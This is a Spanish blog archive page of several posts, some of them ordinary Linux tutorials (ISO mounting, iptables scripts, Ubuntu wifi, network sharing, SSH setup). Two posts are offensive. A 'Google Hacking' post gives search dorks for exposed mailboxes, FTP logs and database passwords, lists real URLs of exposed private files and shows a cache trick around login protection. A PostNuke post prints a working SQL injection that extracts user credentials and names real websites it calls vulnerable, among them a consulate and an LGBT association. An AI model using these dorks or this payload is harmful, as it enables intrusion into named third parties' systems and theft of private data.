Archivo para 30 abril 2008

Google Hacking II!

Escribo este artículo debido a la tirada que tubo la “tontería” del post de “Hacking cámaras de seguridad (Lammer) en este mismo blog.

 

Por Google Hacking no entendemos ataques propiamente contra servidores de Google.com, sino que es un hacking de búsqueda, es decir, aprovechando la gran información recopilada por los bots del buscador para indexar las webs, sacar direcciones de urls interesantes, con información delicada, como cuentas de correo electrónico, errores en sistemas de gestión de bases de datos, logs de servidores, archivos confidenciales y con passwords, listado de directorios…

 

Todo esto es tan sencillo como laborioso e imaginativo, pues con unos “comandos”  programados por el buscador con un determinado fin sacarle otro muy distinto.

 

Algunos de los más interesantes y fáciles en cuanto a resultados inmediatos se refiere, son los siguientes:

 

-Acceso a cuentas de e-mail confidenciales sin previo loggin:

 

filetype:mbx mbx intext:Subject

 

Tipo de resultados que devuelve google:

 

IMAGEN 1

 

Algunas de los mails a los que podemos acceder con esas búsquedas:

http://www.nt.ntnu.no/users/skoge/book/mail43917/1996.mbx

http://www.mediaselectah.com/Special/Users/medsel/main.mbx

http://www.mediaselectah.com/Special/Users/contact/Main.mbx?ref=BenimShopum.com

http://www.lovelu.com/backup/Mail/HUBNI.COM/Users/mail/main.mbx

http://www.lovelu.com/backup/Mail/documentabd.com/Users/agalib/Deleted.mbx

 

No nos podemos centrar en el comando filetype:mbx mbx intext:Subject , para lograr resultados interesantes debemos combinar palabras reservadas, por ejemplo añadiendo “Inurl:users” saldrán cosas diferentes, “inurl”: Hotmail.com todavía más, y así un sinfín de posibilidades. Claro que con 5,5, o 10 palabras obtenemos unos resultados interesantes, cuentas de correo en este caso, mails que ni nos van ni nos vienen, pero haciendo que la inputblox de google se nos quede pequeña se consiguen buenos resultados.

 

          Acceso a Logs confidenciales:

 

Por ejemplo por todos es conocido el WS FTP, un cliente freeware muy común. Pues podemos encontrar logs interesantes con la siguiente secuencia:

 

+htpasswd +WS_FTP.LOG filetype:log

 

Devolviéndonos en google algo similar a esto:

 

IMAGEN2

 

Algunos de los logs que podemos consultar:

 

http://www.hermit.com/hermit/vid/michaelmiller/WS_FTP.LOG

 

Son muy útiles para hacernos una idea de la estructura de un servidor que vamos a atacar, o simplemente estudiar. Aunque de primera mano ya nos puede revelar passwords y logias de acceso al Server, es un a búsqueda muy usada, para ver modificaciones en el servidor reservada a privilegios de administrador, saber el sistema sobre el que está montado el servidor(Apache..),direcciones de acceso ftp, localización de archivos .htpasswd…

 

Algunos servidores intentan protegerse sin éxito, por ejemplo esta dirección restringe el acceso mediante identificación login/pass:

http://costumesociety.org.uk/executive/WS_FTP.LOG

 

Pero podemos saltárnosla de una manera tan sencilla como hacer una búsqueda HTML en google, lo cúal nos daría acceso, resultado:

 

http://66.102.9.104/search?q=cache:gy8OSVE19vwJ:costumesociety.org.uk/executive/WS_FTP.LOG+%2Bhtpasswd+%2BWS_FTP.LOG+filetype:log&hl=es&ct=clnk&cd=5&gl=es

 

Y como decía antes, vemos dirección del Server, datos del ftp, login de acceso,localización de los datos en el servidor, e incluso del archvio .htpasswd….

 

-Archivos con passwords:

 

Buscando con cosas del tipo:

 

filetype:bak createobject sa

 

Nos pueden salir cosas tan interesantes como esta:

 

IMAGEN3

 

En esta imagen podemos ver host, user y password de varias bases de datos.

 

Aplicaciones configuradas por defecto:

Las aplicaciones configuradas por defecto, como tales traen los datos de acceso, claves y demás por defecto. Dichas claves son públicas y se encuentran en cualquier página de la red.

 

Para buscar por ejemplo sitios con configuraciones por defecto de IIS, o de Aache Web Server, buscaríamos de la siguiente manera:

 

intitle:”Welcome to IIS

intitle:”Test Page for Apache”

 

Las opciones de búsqueda como en los demás ejemplo pueden ser múltiples y variadas, y además podemos extrapolar para buscar aplicaciones configuradas por defecto todo un abanico de software web.

 

Por ejemplo para Apache también podríamos usar palabras como “It Worked”, lo que yo recomiendo es instalar primero la aplicación en nuestra máquina y luego búscar datos que nos parecieron relevantes y generalizados de la instalación.

 

http://comminfo.uky.edu/

http://ced.nl/

http://www.tanaka.ecc.u-tokyo.ac.jp/

 

Listado de directorios:

 

La definición del título exime de cualquier explicación:

 

intitle:”Index of” -inurl:htm -inurl:html

 

Y como siempre podemos variar según lo que búsquemos:

 

ENCUENTRA MÚSICA: ( lo pongo en grande porque muchos pasaran del leer el tema “hacking” pero les interesa encontrar los mp3, y para que no pase desapercibido.

intitle:”Index of” -inurl:htm -inurl:html mp3

 

Que nos devolvería directorios cargados de música, por ejemplo así encontré yo:

http://indexofmp3.net/

http://www.audiobiblia.org/mp3/

http://www.audiobiblia.org/mp3/20_Proverbios/

http://www.toguapo.com/mp3/

http://www.mp3fusion.net/ftp/

http://www.villacarlospaz.gov.ar/mp3/

http://franceradio.net/mp3/?PHPSESSID=8849e5545bf6a0632d2cafb5c5a221ee

http://www.hardcore.lt/mp3/VRR/

http://www2.b3ta.com/mp3/

 

Bueno es todo, en próximas entregas, más y mejor.

 

Anuncios

Montar .ISO

En ocasiones queremos montar nuestras imágenes .ISO en linux para no tener que grabarlas, pues en este mini tutorial expongo un par de formas de hacerlo.

Método 1: Sistema tradicional
Abrimos un terminal y escribimos:
$mount -o loop -t iso9660 imagen.iso /punto_de_montaje

Nota: No os olvideis crear con el comando mkdir el punto de montaje :D

Método 2: Sistema intermedio
Gmountiso es una herramienta parecida a las de windows para montar imágenes (Un Daemon tools…) y es realmente sencilla de utilizar.
Si tenemos una distribución basada en debian hacemos
$apt-get install gmountiso

No os olvidéis de poner sudo delante si utilizáis ubuntu ;)
Gmountiso
Como podréis observar hay un campo para elegir la imagen a montar y otro para el punto de montaje, luego se pulsa en “Mount” y listo!

Método 3: El más nuevo!
Como he podido leer en ociolinux ha salido Furious iso
Furius iso
Esta herramienta es la más completa, al igual que gmountiso tiene un campo de punto de montaje y otro para elegir la imagen, pero incluye a mayores la posibilidad de comprobar el cheksum, utilizar imágenes .img o grabar la imagen montada entre otras cosas.
Para aquellos que utilizais distribuciones basadas en debian teneis un paquete .deb
Son realmente 3 alternativas para un tipo de público muy distinto que espero que os sea de gran utilidad

Protege tu Linux con IPtables!Aprende a configurarlo!

IPtables es un sistema de “firewall”, que está ligado al kernel del sistema, al igual que su predecesor “ipchains”. IPtables no tiene nada que ver con la idea que tenemos de firewall de Windows, que lo abrimos y cerramos, que puede dejar de funcionar porque el programa en si se bloquea, o porque lo bloquean aplicaciones malintencionadas como exploits. IPtables es como un script de shell, al que le vamos pasando comandos para configurarlo a nuestro gusto. Es sencillo, si, y probablemente por eso tan bueno.

 

 

Si llevamos todo esto al extremo al más bajo puro nivel de estudio, las respuestas a.. se puede parar IP tables? Es si, puesto que podemos implementar un script de inicio en /etc/rc.d/INIT.d con el que hacer que IPtables arranque o quede fuera de servicio.

 

Bueno vamos  al grano, tenemos un sistema Linux, y queremos protegernos usando IPtables, lo único que tenemos que hacer es escribir un script que se adapte a nuestras necesidades, puesto que cada sistema es un mundo, y no todos usamos el aMule, ni tenemos montado un FTP para que los colegas se bajen warez…

 

Un ejemplo de script bien configurado sería este:

#!/bin/sh
## Ejemplo de SCRIPT de IPTABLES
## Freelogs.NET
## Es un ejemplo adáptalo a tu máquina

echo -n Empezando…

## Algunas reglas interesantes
iptables -F
iptables -X
iptables -Z
iptables -t nat -F

## Aceptamos ciertos protocolos básicos y necesarios…
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -t nat -P PREROUTING ACCEPT
iptables -t nat -P POSTROUTING ACCEPT


/sbin/iptables -A INPUT -i lo -j ACCEPT

# A nuestra IP le permitimos todo
iptables -A INPUT -s 192.168.1.1 -j ACCEPT

# Cerramos puertos abiertos…
iptables -A INPUT -p tcp –dport 3306 -j DROP
iptables -A INPUT -p tcp –dport 10000 -j DROP
iptables -A INPUT -p udp –dport 10000 -j DROP

echo ” Finalizada la carga de directrices a Iptables…”

Por ejemplo si tenemos un servidor de FTP y queremos dejar entrar a un amigo a bajarse archivos tendríamos que permitirlo también, añadiríamos algo así:
 iptables -A INPUT -s 80.23.25.123 -p tcp -dport 20:21 -j ACCEPT

Hay un montón de scripts por la red, muy bien comentados en castellano, con los que tenemos que ir jugando hasta tener la máquina bien configurada, los más gurús en la materia recomiendan cerrar todo, e ir abriendo según vayamos necesitando.

Un script muy paranoico con todo cerrado, y super seguro sería algo así:

 #!/bin/sh
## SCRIPT de IPTABLES –paranoico total.
## Ejemplo de script para proteger la propia máquina con DROP por defecto
## Realizado por  Xabier Altadill Izura bajado de Freelogs.NET

 

 

echo -n Aplicando Reglas de Firewall…

## FLUSH de reglas
iptables -F
iptables -X
iptables -Z
iptables -t nat -F

## Establecemos politica por defecto: DROP
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP

## Empezamos a filtrar? no! empezamos a abrir! porque ahora esta TODO denegado.
## Debemos decir de manera explicita qué es lo que queremos abrir

# Operar en localhost sin limitaciones
/sbin/iptables -A INPUT -i lo -j ACCEPT
/sbin/iptables -A OUTPUT -o lo -j ACCEPT

# A nuestra IP le dejamos todo
iptables -A INPUT -s 195.65.34.234 -j ACCEPT
iptables -A OUTPUT -d 195.65.34.234 -j ACCEPT

# Este es el servicio que DA la maquina a internet, por tanto todo paquete entrante se acepta para
# ese puerto y los salientes vinculados se aceptan.
/sbin/iptables -A INPUT -p tcp -m tcp –dport 80 -j ACCEPT
/sbin/iptables -A OUTPUT -p tcp -m tcp –sport 80 -m state –state RELATED,ESTABLISHED -j ACCEPT

# Permitimos que la maquina pueda salir a la web
/sbin/iptables -A INPUT -p tcp -m tcp –sport 80 -m state –state RELATED,ESTABLISHED -j ACCEPT
/sbin/iptables -A OUTPUT -p tcp -m tcp –dport 80 -j ACCEPT

# Ya tambien a webs seguras
/sbin/iptables -A INPUT -p tcp -m tcp –sport 443 -m state –state RELATED,ESTABLISHED -j ACCEPT
/sbin/iptables -A OUTPUT -p tcp -m tcp –dport 443 -j ACCEPT

# Reglas necesarias para FTP pasivo y activo. Se permiten conexiones entrantes YA establecidas
/sbin/iptables -A INPUT -p tcp -m tcp –sport 20:21 -m state –state RELATED,ESTABLISHED -j ACCEPT
/sbin/iptables -A OUTPUT -p tcp -m tcp –dport 20:21 -j ACCEPT
/sbin/iptables -A INPUT -p tcp -m tcp –sport 1024:65535 –dport 1024:65535 -m state –state ESTABLISHED -j ACCEPT
/sbin/iptables -A OUTPUT -p tcp -m tcp –dport 1024:65535 -m state –state NEW,RELATED,ESTABLISHED -j ACCEPT

# Permitimos la consulta a un primer DNS
/sbin/iptables -A INPUT -s 211.95.64.39 -p udp -m udp –sport 53 -j ACCEPT
/sbin/iptables -A OUTPUT -d 211.95.64.39 -p udp -m udp –dport 53 -j ACCEPT

# Permitimos la consulta a un segundo DNS
/sbin/iptables -A INPUT -s 211.95.79.109 -p udp -m udp –sport 53 -j ACCEPT
/sbin/iptables -A OUTPUT -d 211.95.79.109 -p udp -m udp –dport 53 -j ACCEPT

# Permitimos consultar el reloj de hora.rediris.es (un pentium166) para sincronizarse
/sbin/iptables -A INPUT -s 130.206.3.166 -p udp -m udp –dport 123 -j ACCEPT
/sbin/iptables -A OUTPUT -d 130.206.3.166 -p udp -m udp –sport 123 -j ACCEPT

# Barrera de backup por si cambiamos a modo ACCEPT temporalmente
# Con esto protegemos los puertos reservados y otros well-known
/sbin/iptables -A INPUT -p tcp -m tcp –dport 1:1024 -j DROP
/sbin/iptables -A INPUT -p udp -m udp –dport 1:1024 -j DROP
/sbin/iptables -A INPUT -p tcp -m tcp –dport 1723 -j DROP
/sbin/iptables -A INPUT -p tcp -m tcp –dport 3306 -j DROP
/sbin/iptables -A INPUT -p tcp -m tcp –dport 5432 -j DROP

echo ” OK . Verifique que lo que se aplica con: iptables -L -n”

# Fin del script

Como aplicamos estas reglas a IPtables, pues muy fácil, guardamos los scripts en un archivo y los ejecutamos desde la consola.

 

Configurar wifi en ubuntu

ubuntu logo
En este sencillo tutorial vamos a explicar como hacer en caso de que hayas actualizado tu ubuntu y hayas perdido la conexión wifi, es decir, que te aparezca la conexión pero no conecte, esto pasa sobretodo si tienes una clave wep.

1)Sistema>Administración>Red
2)(paso solo para ubuntu 8.04) Pulsa el botón desbloquear e introduce tu contraseña
3)Pulsas la conexión inalambrica, propiedades
4)Desactivas el modo itinerante y pones tu configuración (Essid, tipo de clave, contraseña y si tienes ip estática o dhcp, con sus correspondientes datos en caso de ip estática)
5)Pulsas cerrar y abres un terminal
6)Escribes “sudo su” (sin comillas e introduces tu contraseña)
7)/etc/init.d/networking restart
8)gedit /etc/network/interfaces
En interfaces te tiene que quedar de esta forma:

A partir de ahora llamaremos interfaz a wlan0 o eth0 según te corresponda, si no sabes cual es tu interfaz, puedes mirarlo escribiendo
sudo iwconfig

En mi caso utilizo dhcp así que pondré la configuración como la tengo yo, si fuese static en lugar de dhcp pondrías static y el resto de tus datos (recomiendo un manual de internet más preciso para este caso ;))

Fichero Interfaces:
auto lo
iface lo inet loopback
auto interfaz
iface interfaz inet dhcp
wireless-key clave
wireless-essid Wireless

Las mayoría de las lineas deberían ya aparecer, y es probable que vuestro fichero interface sea algo distinto pero debería ser más o menos similar a este ;)

ahora guardamos y salimos y en un terminal escribimos:
9)/etc/init.d/networking restart
10)reboot
Es recomendable reiniciar la máquina para ver si nos autodetecta la wifi de inicio ;)

Bueno espero que os sirva, ya sabeis, si teneis dudas, preguntad ;)

Ataque SQL Injection a PostNuke!

 Ha aparecido una vulnerabilidad de tipo SQL Injection en Postnuke.

 

Inyección de código:

 

index.php?module=PostSchedule&view=event&eid=-

 

 1′)+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname,char(58),pn_pass),10,11,12,13/**/

 

 from/**/nuke_users/**/where/**/pn_uid=2/*

 

 

El autor de dicho descubrimiento es Vuln search Kacper (kacper1964_at_yahoo.pl) de http://devilteam.pl

 

Algunas páginas encontradas por Freelogs.Net vulnerables al ataque son:

 

www.exactas.org

www.trabajosocial.unam.mx

www.amigosdelaire.com

www.dentistasrioja.com

www.adolince.net

www.sirzee.itcr.ac.cr

www.azimutclm.com

 

Entre las webs más interesantes destacar:

 

www.consuladouy-bcn.org ( Consulado de Uruguay en Barcelona)

www.lasalle.es ( Mi Ex colegio xD )

www.sinver.org ( Asociación universitaria de GAYS y LESBIANAS DE Barcelona)

www.sexosintabues.com ( Comunidad Erótica de España)

 

Freelogs.NET no ha perpetrado ningún ataque, son datos informativos, no nos hacemos responsables del  uso que se le pueda dar a esta información.

 

 

 

 

 

Compartir Internet con Ubuntu!

Nuestro equipo debe de tener instaladas dos tarjetas de red una que va al MODEM, y otra que va a la red donde deseamos compartir Internet, en el ejemplo la red es 192.168.1.1 y la máscara de red 255.255.255.0

 

Lo primero nos logeamos como root en el sistema, en Ubuntu la cuenta de root por razones de seguridad no está activada, pero se puede poner en marcha con:

 

$ sudo –s –H

 

Activamos el forwarding:

 

$echo 1 > /proc/sys/net/ipv4/ip_forward

 

Configuramos el IPtables para que de acceso a Internet:

 

$iptables -F
$iptables -X
$iptables -Z
$iptables -t nat –F

 

Para hacer el masquerading :

$iptables -t nat -A POSTROUTING -s 192.168.1.1/25 -d 0.0.0.0/0 -j MASQUERADE

Aceptamos los paquetes entrantes:

$iptables -A INPUT -p TCP -m state –state RELATED -j ACCEPT

Para acabar tenemos que configurar los clientes con una IP de la red que montamos, máscara de red, y como puerta de enlace la máquina Ubuntu donde estamos.

Servidor SSH en Ubuntu!

Para montar un servidor SSH en nuestra Ubuntu tan solo tenemos que seguir estos pasos:

 

$sudo apt-cache search ^openssh
openssh-client – Secure shell client, an rlogin/rsh/rcp replacement
openssh-server – Secure shell server, an rshd replacement

$ sudo aptitude install openssh-server openssh-client

$ sudo update-rc.d ssh defaults

Adding system startup for /etc/init.d/ssh …
   /etc/rc0.d/K20ssh -> ../init.d/ssh
   /etc/rc1.d/K20ssh -> ../init.d/ssh
   /etc/rc6.d/K20ssh -> ../init.d/ssh
   /etc/rc2.d/S20ssh -> ../init.d/ssh
   /etc/rc3.d/S20ssh -> ../init.d/ssh
   /etc/rc4.d/S20ssh -> ../init.d/ssh
   /etc/rc5.d/S20ssh -> ../init.d/ssh

$ sudo /etc/init.d/ssh start
* Starting OpenBSD Secure Shell server…                                                                                          [ OK ]
$